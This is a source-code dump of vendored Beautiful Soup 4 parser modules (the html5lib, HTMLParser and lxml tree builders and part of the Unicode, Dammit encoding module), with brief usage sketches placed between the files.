47 | self.user_specified_encoding = user_specified_encoding
48 |
49 | # document_declared_encoding and exclude_encodings aren't used
50 | # ATM because the html5lib TreeBuilder doesn't use
51 | # UnicodeDammit.
52 | if exclude_encodings:
53 | warnings.warn("You provided a value for exclude_encoding, but the html5lib tree builder doesn't support exclude_encoding.")
54 | yield (markup, None, None, False)
55 |
56 | # These methods are defined by Beautiful Soup.
57 | def feed(self, markup):
58 | if self.soup.parse_only is not None:
59 | warnings.warn("You provided a value for parse_only, but the html5lib tree builder doesn't support parse_only. The entire document will be parsed.")
60 | parser = html5lib.HTMLParser(tree=self.create_treebuilder)
61 |
62 | extra_kwargs = dict()
63 | if not isinstance(markup, unicode):
64 | if new_html5lib:
65 | extra_kwargs['override_encoding'] = self.user_specified_encoding
66 | else:
67 | extra_kwargs['encoding'] = self.user_specified_encoding
68 | doc = parser.parse(markup, **extra_kwargs)
69 |
70 | # Set the character encoding detected by the tokenizer.
71 | if isinstance(markup, unicode):
72 | # We need to special-case this because html5lib sets
73 | # charEncoding to UTF-8 if it gets Unicode input.
74 | doc.original_encoding = None
75 | else:
76 | original_encoding = parser.tokenizer.stream.charEncoding[0]
77 | if not isinstance(original_encoding, basestring):
78 | # In 0.99999999 and up, the encoding is an html5lib
79 | # Encoding object. We want to use a string for compatibility
80 | # with other tree builders.
81 | original_encoding = original_encoding.name
82 | doc.original_encoding = original_encoding
83 |
84 | def create_treebuilder(self, namespaceHTMLElements):
85 | self.underlying_builder = TreeBuilderForHtml5lib(
86 | self.soup, namespaceHTMLElements)
87 | return self.underlying_builder
88 |
89 | def test_fragment_to_document(self, fragment):
90 | """See `TreeBuilder`."""
91 | return u'<html><head></head><body>%s</body></html>' % fragment
92 |
93 |
94 | class TreeBuilderForHtml5lib(treebuilder_base.TreeBuilder):
95 |
96 | def __init__(self, soup, namespaceHTMLElements):
97 | self.soup = soup
98 | super(TreeBuilderForHtml5lib, self).__init__(namespaceHTMLElements)
99 |
100 | def documentClass(self):
101 | self.soup.reset()
102 | return Element(self.soup, self.soup, None)
103 |
104 | def insertDoctype(self, token):
105 | name = token["name"]
106 | publicId = token["publicId"]
107 | systemId = token["systemId"]
108 |
109 | doctype = Doctype.for_name_and_ids(name, publicId, systemId)
110 | self.soup.object_was_parsed(doctype)
111 |
112 | def elementClass(self, name, namespace):
113 | tag = self.soup.new_tag(name, namespace)
114 | return Element(tag, self.soup, namespace)
115 |
116 | def commentClass(self, data):
117 | return TextNode(Comment(data), self.soup)
118 |
119 | def fragmentClass(self):
120 | from lib.bs4 import BeautifulSoup; self.soup = BeautifulSoup("")  # local import avoids a circular import at module load
121 | self.soup.name = "[document_fragment]"
122 | return Element(self.soup, self.soup, None)
123 |
124 | def appendChild(self, node):
125 | # XXX This code is not covered by the BS4 tests.
126 | self.soup.append(node.element)
127 |
128 | def getDocument(self):
129 | return self.soup
130 |
131 | def getFragment(self):
132 | return treebuilder_base.TreeBuilder.getFragment(self).element
133 |
134 | class AttrList(object):
135 | def __init__(self, element):
136 | self.element = element
137 | self.attrs = dict(self.element.attrs)
138 | def __iter__(self):
139 | return list(self.attrs.items()).__iter__()
140 | def __setitem__(self, name, value):
141 | # If this attribute is a multi-valued attribute for this element,
142 | # turn its value into a list.
143 | list_attr = HTML5TreeBuilder.cdata_list_attributes
144 | if (name in list_attr['*']
145 | or (self.element.name in list_attr
146 | and name in list_attr[self.element.name])):
147 | # A node that is being cloned may have already undergone
148 | # this procedure.
149 | if not isinstance(value, list):
150 | value = whitespace_re.split(value)
151 | self.element[name] = value
152 | def items(self):
153 | return list(self.attrs.items())
154 | def keys(self):
155 | return list(self.attrs.keys())
156 | def __len__(self):
157 | return len(self.attrs)
158 | def __getitem__(self, name):
159 | return self.attrs[name]
160 | def __contains__(self, name):
161 | return name in list(self.attrs.keys())
162 |
163 |
164 | class Element(treebuilder_base.Node):
165 | def __init__(self, element, soup, namespace):
166 | treebuilder_base.Node.__init__(self, element.name)
167 | self.element = element
168 | self.soup = soup
169 | self.namespace = namespace
170 |
171 | def appendChild(self, node):
172 | string_child = child = None
173 | if isinstance(node, basestring):
174 | # Some other piece of code decided to pass in a string
175 | # instead of creating a TextElement object to contain the
176 | # string.
177 | string_child = child = node
178 | elif isinstance(node, Tag):
179 | # Some other piece of code decided to pass in a Tag
180 | # instead of creating an Element object to contain the
181 | # Tag.
182 | child = node
183 | elif node.element.__class__ == NavigableString:
184 | string_child = child = node.element
185 | else:
186 | child = node.element
187 |
188 | if not isinstance(child, basestring) and child.parent is not None:
189 | node.element.extract()
190 |
191 | if (string_child and self.element.contents
192 | and self.element.contents[-1].__class__ == NavigableString):
193 | # We are appending a string onto another string.
194 | # TODO This has O(n^2) performance, for input like
195 | # "aaa..."
196 | old_element = self.element.contents[-1]
197 | new_element = self.soup.new_string(old_element + string_child)
198 | old_element.replace_with(new_element)
199 | self.soup._most_recent_element = new_element
200 | else:
201 | if isinstance(node, basestring):
202 | # Create a brand new NavigableString from this string.
203 | child = self.soup.new_string(node)
204 |
205 | # Tell Beautiful Soup to act as if it parsed this element
206 | # immediately after the parent's last descendant. (Or
207 | # immediately after the parent, if it has no children.)
208 | if self.element.contents:
209 | most_recent_element = self.element._last_descendant(False)
210 | elif self.element.next_element is not None:
211 | # Something from further ahead in the parse tree is
212 | # being inserted into this earlier element. This is
213 | # very annoying because it means an expensive search
214 | # for the last element in the tree.
215 | most_recent_element = self.soup._last_descendant()
216 | else:
217 | most_recent_element = self.element
218 |
219 | self.soup.object_was_parsed(
220 | child, parent=self.element,
221 | most_recent_element=most_recent_element)
222 |
223 | def getAttributes(self):
224 | return AttrList(self.element)
225 |
226 | def setAttributes(self, attributes):
227 |
228 | if attributes is not None and len(attributes) > 0:
229 |
230 | converted_attributes = []
231 | for name, value in list(attributes.items()):
232 | if isinstance(name, tuple):
233 | new_name = NamespacedAttribute(*name)
234 | del attributes[name]
235 | attributes[new_name] = value
236 |
237 | self.soup.builder._replace_cdata_list_attribute_values(
238 | self.name, attributes)
239 | for name, value in attributes.items():
240 | self.element[name] = value
241 |
242 | # The attributes may contain variables that need substitution.
243 | # Call set_up_substitutions manually.
244 | #
245 | # The Tag constructor called this method when the Tag was created,
246 | # but we just set/changed the attributes, so call it again.
247 | self.soup.builder.set_up_substitutions(self.element)
248 | attributes = property(getAttributes, setAttributes)
249 |
250 | def insertText(self, data, insertBefore=None):
251 | if insertBefore:
252 | text = TextNode(self.soup.new_string(data), self.soup)
253 | self.insertBefore(text, insertBefore)
254 | else:
255 | self.appendChild(data)
256 |
257 | def insertBefore(self, node, refNode):
258 | index = self.element.index(refNode.element)
259 | if (node.element.__class__ == NavigableString and self.element.contents
260 | and self.element.contents[index-1].__class__ == NavigableString):
261 | # (See comments in appendChild)
262 | old_node = self.element.contents[index-1]
263 | new_str = self.soup.new_string(old_node + node.element)
264 | old_node.replace_with(new_str)
265 | else:
266 | self.element.insert(index, node.element)
267 | node.parent = self
268 |
269 | def removeChild(self, node):
270 | node.element.extract()
271 |
272 | def reparentChildren(self, new_parent):
273 | """Move all of this tag's children into another tag."""
274 | # print "MOVE", self.element.contents
275 | # print "FROM", self.element
276 | # print "TO", new_parent.element
277 | element = self.element
278 | new_parent_element = new_parent.element
279 | # Determine what this tag's next_element will be once all the children
280 | # are removed.
281 | final_next_element = element.next_sibling
282 |
283 | new_parents_last_descendant = new_parent_element._last_descendant(False, False)
284 | if len(new_parent_element.contents) > 0:
285 | # The new parent already contains children. We will be
286 | # appending this tag's children to the end.
287 | new_parents_last_child = new_parent_element.contents[-1]
288 | new_parents_last_descendant_next_element = new_parents_last_descendant.next_element
289 | else:
290 | # The new parent contains no children.
291 | new_parents_last_child = None
292 | new_parents_last_descendant_next_element = new_parent_element.next_element
293 |
294 | to_append = element.contents
295 | append_after = new_parent_element.contents
296 | if len(to_append) > 0:
297 | # Set the first child's previous_element and previous_sibling
298 | # to elements within the new parent
299 | first_child = to_append[0]
300 | if new_parents_last_descendant:
301 | first_child.previous_element = new_parents_last_descendant
302 | else:
303 | first_child.previous_element = new_parent_element
304 | first_child.previous_sibling = new_parents_last_child
305 | if new_parents_last_descendant:
306 | new_parents_last_descendant.next_element = first_child
307 | else:
308 | new_parent_element.next_element = first_child
309 | if new_parents_last_child:
310 | new_parents_last_child.next_sibling = first_child
311 |
312 | # Fix the last child's next_element and next_sibling
313 | last_child = to_append[-1]
314 | last_child.next_element = new_parents_last_descendant_next_element
315 | if new_parents_last_descendant_next_element:
316 | new_parents_last_descendant_next_element.previous_element = last_child
317 | last_child.next_sibling = None
318 |
319 | for child in to_append:
320 | child.parent = new_parent_element
321 | new_parent_element.contents.append(child)
322 |
323 | # Now that this element has no children, change its .next_element.
324 | element.contents = []
325 | element.next_element = final_next_element
326 |
327 | # print "DONE WITH MOVE"
328 | # print "FROM", self.element
329 | # print "TO", new_parent_element
330 |
331 | def cloneNode(self):
332 | tag = self.soup.new_tag(self.element.name, self.namespace)
333 | node = Element(tag, self.soup, self.namespace)
334 | for key,value in self.attributes:
335 | node.attributes[key] = value
336 | return node
337 |
338 | def hasContent(self):
339 | return self.element.contents
340 |
341 | def getNameTuple(self):
342 | if self.namespace == None:
343 | return namespaces["html"], self.name
344 | else:
345 | return self.namespace, self.name
346 |
347 | nameTuple = property(getNameTuple)
348 |
349 | class TextNode(Element):
350 | def __init__(self, element, soup):
351 | treebuilder_base.Node.__init__(self, None)
352 | self.element = element
353 | self.soup = soup
354 |
355 | def cloneNode(self):
356 | raise NotImplementedError
357 |
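
A sketch of selecting this builder by its feature name, assuming html5lib
is actually installed so the registration in builder/__init__.py succeeded:

    from lib.bs4 import BeautifulSoup

    # html5lib repairs markup the way browsers do: it supplies the
    # missing <html>/<head>/<body> scaffolding and closes the open <p>.
    soup = BeautifulSoup("<p>unclosed", "html5lib")
    print(soup.body.p.string)  # u'unclosed'
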
--------------------------------------------------------------------------------
/weeman/lib/bs4/builder/_htmlparser.py:
--------------------------------------------------------------------------------
1 | """Use the HTMLParser library to parse HTML files that aren't too bad."""
2 |
3 | # Use of this source code is governed by a BSD-style license that can be
4 | # found in the LICENSE file.
5 |
6 | __all__ = [
7 | 'HTMLParserTreeBuilder',
8 | ]
9 |
10 | from HTMLParser import HTMLParser
11 |
12 | try:
13 | from HTMLParser import HTMLParseError
14 | except ImportError, e:
15 | # HTMLParseError is removed in Python 3.5. Since it can never be
16 | # thrown in 3.5, we can just define our own class as a placeholder.
17 | class HTMLParseError(Exception):
18 | pass
19 |
20 | import sys
21 | import warnings
22 |
23 | # Starting in Python 3.2, the HTMLParser constructor takes a 'strict'
24 | # argument, which we'd like to set to False. Unfortunately,
25 | # http://bugs.python.org/issue13273 makes strict=True a better bet
26 | # before Python 3.2.3.
27 | #
28 | # At the end of this file, we monkeypatch HTMLParser so that
29 | # strict=True works well on Python 3.2.2.
30 | major, minor, release = sys.version_info[:3]
31 | CONSTRUCTOR_TAKES_STRICT = major == 3 and minor == 2 and release >= 3
32 | CONSTRUCTOR_STRICT_IS_DEPRECATED = major == 3 and minor == 3
33 | CONSTRUCTOR_TAKES_CONVERT_CHARREFS = major == 3 and minor >= 4
34 |
35 |
36 | from lib.bs4.element import (
37 | CData,
38 | Comment,
39 | Declaration,
40 | Doctype,
41 | ProcessingInstruction,
42 | )
43 | from lib.bs4.dammit import EntitySubstitution, UnicodeDammit
44 |
45 | from lib.bs4.builder import (
46 | HTML,
47 | HTMLTreeBuilder,
48 | STRICT,
49 | )
50 |
51 |
52 | HTMLPARSER = 'html.parser'
53 |
54 | class BeautifulSoupHTMLParser(HTMLParser):
55 | def handle_starttag(self, name, attrs):
56 | # XXX namespace
57 | attr_dict = {}
58 | for key, value in attrs:
59 | # Change None attribute values to the empty string
60 | # for consistency with the other tree builders.
61 | if value is None:
62 | value = ''
63 | attr_dict[key] = value
64 | attrvalue = '""'
65 | self.soup.handle_starttag(name, None, None, attr_dict)
66 |
67 | def handle_endtag(self, name):
68 | self.soup.handle_endtag(name)
69 |
70 | def handle_data(self, data):
71 | self.soup.handle_data(data)
72 |
73 | def handle_charref(self, name):
74 | # XXX workaround for a bug in HTMLParser. Remove this once
75 | # it's fixed in all supported versions.
76 | # http://bugs.python.org/issue13633
77 | if name.startswith('x'):
78 | real_name = int(name.lstrip('x'), 16)
79 | elif name.startswith('X'):
80 | real_name = int(name.lstrip('X'), 16)
81 | else:
82 | real_name = int(name)
83 |
84 | try:
85 | data = unichr(real_name)
86 | except (ValueError, OverflowError), e:
87 | data = u"\N{REPLACEMENT CHARACTER}"
88 |
89 | self.handle_data(data)
90 |
91 | def handle_entityref(self, name):
92 | character = EntitySubstitution.HTML_ENTITY_TO_CHARACTER.get(name)
93 | if character is not None:
94 | data = character
95 | else:
96 | data = "&%s;" % name
97 | self.handle_data(data)
98 |
99 | def handle_comment(self, data):
100 | self.soup.endData()
101 | self.soup.handle_data(data)
102 | self.soup.endData(Comment)
103 |
104 | def handle_decl(self, data):
105 | self.soup.endData()
106 | if data.startswith("DOCTYPE "):
107 | data = data[len("DOCTYPE "):]
108 | elif data == 'DOCTYPE':
109 | # i.e. "<!DOCTYPE>"
110 | data = ''
111 | self.soup.handle_data(data)
112 | self.soup.endData(Doctype)
113 |
114 | def unknown_decl(self, data):
115 | if data.upper().startswith('CDATA['):
116 | cls = CData
117 | data = data[len('CDATA['):]
118 | else:
119 | cls = Declaration
120 | self.soup.endData()
121 | self.soup.handle_data(data)
122 | self.soup.endData(cls)
123 |
124 | def handle_pi(self, data):
125 | self.soup.endData()
126 | self.soup.handle_data(data)
127 | self.soup.endData(ProcessingInstruction)
128 |
129 |
130 | class HTMLParserTreeBuilder(HTMLTreeBuilder):
131 |
132 | is_xml = False
133 | picklable = True
134 | NAME = HTMLPARSER
135 | features = [NAME, HTML, STRICT]
136 |
137 | def __init__(self, *args, **kwargs):
138 | if CONSTRUCTOR_TAKES_STRICT and not CONSTRUCTOR_STRICT_IS_DEPRECATED:
139 | kwargs['strict'] = False
140 | if CONSTRUCTOR_TAKES_CONVERT_CHARREFS:
141 | kwargs['convert_charrefs'] = False
142 | self.parser_args = (args, kwargs)
143 |
144 | def prepare_markup(self, markup, user_specified_encoding=None,
145 | document_declared_encoding=None, exclude_encodings=None):
146 | """
147 | :return: A 4-tuple (markup, original encoding, encoding
148 | declared within markup, whether any characters had to be
149 | replaced with REPLACEMENT CHARACTER).
150 | """
151 | if isinstance(markup, unicode):
152 | yield (markup, None, None, False)
153 | return
154 |
155 | try_encodings = [user_specified_encoding, document_declared_encoding]
156 | dammit = UnicodeDammit(markup, try_encodings, is_html=True,
157 | exclude_encodings=exclude_encodings)
158 | yield (dammit.markup, dammit.original_encoding,
159 | dammit.declared_html_encoding,
160 | dammit.contains_replacement_characters)
161 |
162 | def feed(self, markup):
163 | args, kwargs = self.parser_args
164 | parser = BeautifulSoupHTMLParser(*args, **kwargs)
165 | parser.soup = self.soup
166 | try:
167 | parser.feed(markup)
168 | except HTMLParseError, e:
169 | warnings.warn(RuntimeWarning(
170 | "Python's built-in HTMLParser cannot parse the given document. This is not a bug in Beautiful Soup. The best solution is to install an external parser (lxml or html5lib), and use Beautiful Soup with that parser. See http://www.crummy.com/software/BeautifulSoup/bs4/doc/#installing-a-parser for help."))
171 | raise e
172 |
173 | # Patch 3.2 versions of HTMLParser earlier than 3.2.3 to use some
174 | # 3.2.3 code. This ensures they don't treat markup like
175 | # <a href="http://foo.com/"> as a string.
176 | #
177 | # XXX This code can be removed once most Python 3 users are on 3.2.3.
178 | if major == 3 and minor == 2 and not CONSTRUCTOR_TAKES_STRICT:
179 | import re
180 | attrfind_tolerant = re.compile(
181 | r'\s*((?<=[\'"\s])[^\s/>][^\s/=>]*)(\s*=+\s*'
182 | r'(\'[^\']*\'|"[^"]*"|(?![\'"])[^>\s]*))?')
183 | HTMLParserTreeBuilder.attrfind_tolerant = attrfind_tolerant
184 |
185 | locatestarttagend = re.compile(r"""
186 | <[a-zA-Z][-.a-zA-Z0-9:_]* # tag name
187 | (?:\s+ # whitespace before attribute name
188 | (?:[a-zA-Z_][-.:a-zA-Z0-9_]* # attribute name
189 | (?:\s*=\s* # value indicator
190 | (?:'[^']*' # LITA-enclosed value
191 | |\"[^\"]*\" # LIT-enclosed value
192 | |[^'\">\s]+ # bare value
193 | )
194 | )?
195 | )
196 | )*
197 | \s* # trailing whitespace
198 | """, re.VERBOSE)
199 | BeautifulSoupHTMLParser.locatestarttagend = locatestarttagend
200 |
201 | from html.parser import tagfind, attrfind
202 |
203 | def parse_starttag(self, i):
204 | self.__starttag_text = None
205 | endpos = self.check_for_whole_start_tag(i)
206 | if endpos < 0:
207 | return endpos
208 | rawdata = self.rawdata
209 | self.__starttag_text = rawdata[i:endpos]
210 |
211 | # Now parse the data between i+1 and j into a tag and attrs
212 | attrs = []
213 | match = tagfind.match(rawdata, i+1)
214 | assert match, 'unexpected call to parse_starttag()'
215 | k = match.end()
216 | self.lasttag = tag = rawdata[i+1:k].lower()
217 | while k < endpos:
218 | if self.strict:
219 | m = attrfind.match(rawdata, k)
220 | else:
221 | m = attrfind_tolerant.match(rawdata, k)
222 | if not m:
223 | break
224 | attrname, rest, attrvalue = m.group(1, 2, 3)
225 | if not rest:
226 | attrvalue = None
227 | elif attrvalue[:1] == '\'' == attrvalue[-1:] or \
228 | attrvalue[:1] == '"' == attrvalue[-1:]:
229 | attrvalue = attrvalue[1:-1]
230 | if attrvalue:
231 | attrvalue = self.unescape(attrvalue)
232 | attrs.append((attrname.lower(), attrvalue))
233 | k = m.end()
234 |
235 | end = rawdata[k:endpos].strip()
236 | if end not in (">", "/>"):
237 | lineno, offset = self.getpos()
238 | if "\n" in self.__starttag_text:
239 | lineno = lineno + self.__starttag_text.count("\n")
240 | offset = len(self.__starttag_text) \
241 | - self.__starttag_text.rfind("\n")
242 | else:
243 | offset = offset + len(self.__starttag_text)
244 | if self.strict:
245 | self.error("junk characters in start tag: %r"
246 | % (rawdata[k:endpos][:20],))
247 | self.handle_data(rawdata[i:endpos])
248 | return endpos
249 | if end.endswith('/>'):
250 | # XHTML-style empty tag:
251 | self.handle_startendtag(tag, attrs)
252 | else:
253 | self.handle_starttag(tag, attrs)
254 | if tag in self.CDATA_CONTENT_ELEMENTS:
255 | self.set_cdata_mode(tag)
256 | return endpos
257 |
258 | def set_cdata_mode(self, elem):
259 | self.cdata_elem = elem.lower()
260 | self.interesting = re.compile(r'</\s*%s\s*>' % self.cdata_elem, re.I)
261 |
262 | BeautifulSoupHTMLParser.parse_starttag = parse_starttag
263 | BeautifulSoupHTMLParser.set_cdata_mode = set_cdata_mode
264 |
265 | CONSTRUCTOR_TAKES_STRICT = True
266 |
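
A sketch of the reference handling above (handle_charref and
handle_entityref), using this stdlib-backed builder:

    from lib.bs4 import BeautifulSoup

    # A decimal reference, a hex reference, and a named entity; all
    # three are converted and joined into a single NavigableString.
    soup = BeautifulSoup("<p>&#65;&#x42;&amp;</p>", "html.parser")
    print(soup.p.string)  # u'AB&'
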
--------------------------------------------------------------------------------
/weeman/lib/bs4/builder/_lxml.py:
--------------------------------------------------------------------------------
1 | # Use of this source code is governed by a BSD-style license that can be
2 | # found in the LICENSE file.
3 | __all__ = [
4 | 'LXMLTreeBuilderForXML',
5 | 'LXMLTreeBuilder',
6 | ]
7 |
8 | from io import BytesIO
9 | from StringIO import StringIO
10 | import collections
11 | from lxml import etree
12 | from lib.bs4.element import (
13 | Comment,
14 | Doctype,
15 | NamespacedAttribute,
16 | ProcessingInstruction,
17 | XMLProcessingInstruction,
18 | )
19 | from lib.bs4.builder import (
20 | FAST,
21 | HTML,
22 | HTMLTreeBuilder,
23 | PERMISSIVE,
24 | ParserRejectedMarkup,
25 | TreeBuilder,
26 | XML)
27 | from lib.bs4.dammit import EncodingDetector
28 |
29 | LXML = 'lxml'
30 |
31 | class LXMLTreeBuilderForXML(TreeBuilder):
32 | DEFAULT_PARSER_CLASS = etree.XMLParser
33 |
34 | is_xml = True
35 | processing_instruction_class = XMLProcessingInstruction
36 |
37 | NAME = "lxml-xml"
38 | ALTERNATE_NAMES = ["xml"]
39 |
40 | # Well, it's permissive by XML parser standards.
41 | features = [NAME, LXML, XML, FAST, PERMISSIVE]
42 |
43 | CHUNK_SIZE = 512
44 |
45 | # This namespace mapping is specified in the XML Namespace
46 | # standard.
47 | DEFAULT_NSMAPS = {'http://www.w3.org/XML/1998/namespace' : "xml"}
48 |
49 | def default_parser(self, encoding):
50 | # This can either return a parser object or a class, which
51 | # will be instantiated with default arguments.
52 | if self._default_parser is not None:
53 | return self._default_parser
54 | return etree.XMLParser(
55 | target=self, strip_cdata=False, recover=True, encoding=encoding)
56 |
57 | def parser_for(self, encoding):
58 | # Use the default parser.
59 | parser = self.default_parser(encoding)
60 |
61 | if isinstance(parser, collections.Callable):
62 | # Instantiate the parser with default arguments
63 | parser = parser(target=self, strip_cdata=False, encoding=encoding)
64 | return parser
65 |
66 | def __init__(self, parser=None, empty_element_tags=None):
67 | # TODO: Issue a warning if parser is present but not a
68 | # callable, since that means there's no way to create new
69 | # parsers for different encodings.
70 | self._default_parser = parser
71 | if empty_element_tags is not None:
72 | self.empty_element_tags = set(empty_element_tags)
73 | self.soup = None
74 | self.nsmaps = [self.DEFAULT_NSMAPS]
75 |
76 | def _getNsTag(self, tag):
77 | # Split the namespace URL out of a fully-qualified lxml tag
78 | # name. Copied from lxml's src/lxml/sax.py.
79 | if tag[0] == '{':
80 | return tuple(tag[1:].split('}', 1))
81 | else:
82 | return (None, tag)
83 |
84 | def prepare_markup(self, markup, user_specified_encoding=None,
85 | exclude_encodings=None,
86 | document_declared_encoding=None):
87 | """
88 | :yield: A series of 4-tuples.
89 | (markup, encoding, declared encoding,
90 | has undergone character replacement)
91 |
92 | Each 4-tuple represents a strategy for parsing the document.
93 | """
94 | # Instead of using UnicodeDammit to convert the bytestring to
95 | # Unicode using different encodings, use EncodingDetector to
96 | # iterate over the encodings, and tell lxml to try to parse
97 | # the document as each one in turn.
98 | is_html = not self.is_xml
99 | if is_html:
100 | self.processing_instruction_class = ProcessingInstruction
101 | else:
102 | self.processing_instruction_class = XMLProcessingInstruction
103 |
104 | if isinstance(markup, unicode):
105 | # We were given Unicode. Maybe lxml can parse Unicode on
106 | # this system?
107 | yield markup, None, document_declared_encoding, False
108 |
109 | if isinstance(markup, unicode):
110 | # No, apparently not. Convert the Unicode to UTF-8 and
111 | # tell lxml to parse it as UTF-8.
112 | yield (markup.encode("utf8"), "utf8",
113 | document_declared_encoding, False)
114 |
115 | try_encodings = [user_specified_encoding, document_declared_encoding]
116 | detector = EncodingDetector(
117 | markup, try_encodings, is_html, exclude_encodings)
118 | for encoding in detector.encodings:
119 | yield (detector.markup, encoding, document_declared_encoding, False)
120 |
121 | def feed(self, markup):
122 | if isinstance(markup, bytes):
123 | markup = BytesIO(markup)
124 | elif isinstance(markup, unicode):
125 | markup = StringIO(markup)
126 |
127 | # Call feed() at least once, even if the markup is empty,
128 | # or the parser won't be initialized.
129 | data = markup.read(self.CHUNK_SIZE)
130 | try:
131 | self.parser = self.parser_for(self.soup.original_encoding)
132 | self.parser.feed(data)
133 | while len(data) != 0:
134 | # Now call feed() on the rest of the data, chunk by chunk.
135 | data = markup.read(self.CHUNK_SIZE)
136 | if len(data) != 0:
137 | self.parser.feed(data)
138 | self.parser.close()
139 | except (UnicodeDecodeError, LookupError, etree.ParserError), e:
140 | raise ParserRejectedMarkup(str(e))
141 |
142 | def close(self):
143 | self.nsmaps = [self.DEFAULT_NSMAPS]
144 |
145 | def start(self, name, attrs, nsmap={}):
146 | # Make sure attrs is a mutable dict--lxml may send an immutable dictproxy.
147 | attrs = dict(attrs)
148 | nsprefix = None
149 | # Invert each namespace map as it comes in.
150 | if len(self.nsmaps) > 1:
151 | # There are no new namespaces for this tag, but
152 | # non-default namespaces are in play, so we need a
153 | # separate tag stack to know when they end.
154 | self.nsmaps.append(None)
155 | elif len(nsmap) > 0:
156 | # A new namespace mapping has come into play.
157 | inverted_nsmap = dict((value, key) for key, value in nsmap.items())
158 | self.nsmaps.append(inverted_nsmap)
159 | # Also treat the namespace mapping as a set of attributes on the
160 | # tag, so we can recreate it later.
161 | attrs = attrs.copy()
162 | for prefix, namespace in nsmap.items():
163 | attribute = NamespacedAttribute(
164 | "xmlns", prefix, "http://www.w3.org/2000/xmlns/")
165 | attrs[attribute] = namespace
166 |
167 | # Namespaces are in play. Find any attributes that came in
168 | # from lxml with namespaces attached to their names, and
169 | # turn them into NamespacedAttribute objects.
170 | new_attrs = {}
171 | for attr, value in attrs.items():
172 | namespace, attr = self._getNsTag(attr)
173 | if namespace is None:
174 | new_attrs[attr] = value
175 | else:
176 | nsprefix = self._prefix_for_namespace(namespace)
177 | attr = NamespacedAttribute(nsprefix, attr, namespace)
178 | new_attrs[attr] = value
179 | attrs = new_attrs
180 |
181 | namespace, name = self._getNsTag(name)
182 | nsprefix = self._prefix_for_namespace(namespace)
183 | self.soup.handle_starttag(name, namespace, nsprefix, attrs)
184 |
185 | def _prefix_for_namespace(self, namespace):
186 | """Find the currently active prefix for the given namespace."""
187 | if namespace is None:
188 | return None
189 | for inverted_nsmap in reversed(self.nsmaps):
190 | if inverted_nsmap is not None and namespace in inverted_nsmap:
191 | return inverted_nsmap[namespace]
192 | return None
193 |
194 | def end(self, name):
195 | self.soup.endData()
196 | completed_tag = self.soup.tagStack[-1]
197 | namespace, name = self._getNsTag(name)
198 | nsprefix = None
199 | if namespace is not None:
200 | for inverted_nsmap in reversed(self.nsmaps):
201 | if inverted_nsmap is not None and namespace in inverted_nsmap:
202 | nsprefix = inverted_nsmap[namespace]
203 | break
204 | self.soup.handle_endtag(name, nsprefix)
205 | if len(self.nsmaps) > 1:
206 | # This tag, or one of its parents, introduced a namespace
207 | # mapping, so pop it off the stack.
208 | self.nsmaps.pop()
209 |
210 | def pi(self, target, data):
211 | self.soup.endData()
212 | self.soup.handle_data(target + ' ' + data)
213 | self.soup.endData(self.processing_instruction_class)
214 |
215 | def data(self, content):
216 | self.soup.handle_data(content)
217 |
218 | def doctype(self, name, pubid, system):
219 | self.soup.endData()
220 | doctype = Doctype.for_name_and_ids(name, pubid, system)
221 | self.soup.object_was_parsed(doctype)
222 |
223 | def comment(self, content):
224 | "Handle comments as Comment objects."
225 | self.soup.endData()
226 | self.soup.handle_data(content)
227 | self.soup.endData(Comment)
228 |
229 | def test_fragment_to_document(self, fragment):
230 | """See `TreeBuilder`."""
231 | return u'<?xml version="1.0" encoding="utf-8"?>\n%s' % fragment
232 |
233 |
234 | class LXMLTreeBuilder(HTMLTreeBuilder, LXMLTreeBuilderForXML):
235 |
236 | NAME = LXML
237 | ALTERNATE_NAMES = ["lxml-html"]
238 |
239 | features = ALTERNATE_NAMES + [NAME, HTML, FAST, PERMISSIVE]
240 | is_xml = False
241 | processing_instruction_class = ProcessingInstruction
242 |
243 | def default_parser(self, encoding):
244 | return etree.HTMLParser
245 |
246 | def feed(self, markup):
247 | encoding = self.soup.original_encoding
248 | try:
249 | self.parser = self.parser_for(encoding)
250 | self.parser.feed(markup)
251 | self.parser.close()
252 | except (UnicodeDecodeError, LookupError, etree.ParserError), e:
253 | raise ParserRejectedMarkup(str(e))
254 |
255 |
256 | def test_fragment_to_document(self, fragment):
257 | """See `TreeBuilder`."""
258 | return u'<html><body>%s</body></html>' % fragment
259 |
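# --- Editor's note: illustrative usage sketch, not part of the vendored file. ---
# The two builders register under the feature names declared above, so callers
# select them by feature string rather than by class:
#
#     from lib.bs4 import BeautifulSoup
#     xml_soup  = BeautifulSoup("<a><b/></a>", "lxml-xml")  # LXMLTreeBuilderForXML
#     html_soup = BeautifulSoup("<p>unclosed", "lxml")      # LXMLTreeBuilder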
--------------------------------------------------------------------------------
/weeman/lib/bs4/dammit.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """Beautiful Soup bonus library: Unicode, Dammit
3 |
4 | This library converts a bytestream to Unicode through any means
5 | necessary. It is heavily based on code from Mark Pilgrim's Universal
6 | Feed Parser. It works best on XML and HTML, but it does not rewrite the
7 | XML or HTML to reflect a new encoding; that's the tree builder's job.
8 | """
9 | # Use of this source code is governed by a BSD-style license that can be
10 | # found in the LICENSE file.
11 | __license__ = "MIT"
12 |
13 | import codecs
14 | from htmlentitydefs import codepoint2name
15 | import re
16 | import logging
17 | import string
18 |
19 | # Import a library to autodetect character encodings.
20 | chardet_type = None
21 | try:
22 | # First try the fast C implementation.
23 | # PyPI package: cchardet
24 | import cchardet
25 | def chardet_dammit(s):
26 | return cchardet.detect(s)['encoding']
27 | except ImportError:
28 | try:
29 | # Fall back to the pure Python implementation
30 | # Debian package: python-chardet
31 | # PyPI package: chardet
32 | import chardet
33 | def chardet_dammit(s):
34 | return chardet.detect(s)['encoding']
35 | #import chardet.constants
36 | #chardet.constants._debug = 1
37 | except ImportError:
38 | # No chardet available.
39 | def chardet_dammit(s):
40 | return None
41 |
42 | # Available from http://cjkpython.i18n.org/.
43 | try:
44 | import iconv_codec
45 | except ImportError:
46 | pass
47 |
48 | xml_encoding_re = re.compile(
49 | '^<\?.*encoding=[\'"](.*?)[\'"].*\?>'.encode(), re.I)
50 | html_meta_re = re.compile(
51 | '<\s*meta[^>]+charset\s*=\s*["\']?([^>]*?)[ /;\'">]'.encode(), re.I)
52 |
53 | class EntitySubstitution(object):
54 |
55 | """Substitute XML or HTML entities for the corresponding characters."""
56 |
57 | def _populate_class_variables():
58 | lookup = {}
59 | reverse_lookup = {}
60 | characters_for_re = []
61 | for codepoint, name in list(codepoint2name.items()):
62 | character = unichr(codepoint)
63 | if codepoint != 34:
64 | # There's no point in turning the quotation mark into
65 | # ", unless it happens within an attribute value, which
66 | # is handled elsewhere.
